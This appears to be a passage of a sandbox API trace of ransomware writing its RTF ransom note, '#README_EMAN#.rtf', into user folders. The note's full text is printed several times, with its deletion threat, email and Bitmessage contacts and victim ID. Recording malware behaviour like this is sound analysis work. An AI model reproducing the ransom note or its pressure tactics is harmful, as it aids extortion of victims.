that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.686] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n³:Ý\x11\x97b\x1c\x19dÁÎ\x1dتxU¼É¯\x84\x82\x186Ó\x19", lpUsedDefaultChar=0x0) returned 8717 [0301.686] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0301.687] CloseHandle (hObject=0x27c) returned 1 [0301.687] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\#readme_eman#.rtf")) returned 0x20 [0301.687] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Credentials\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\credentials\\#readme_eman#.rtf")) returned 0xffffffff [0301.687] GetLastError () returned 0x2 [0301.687] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Credentials\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\credentials\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0301.688] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 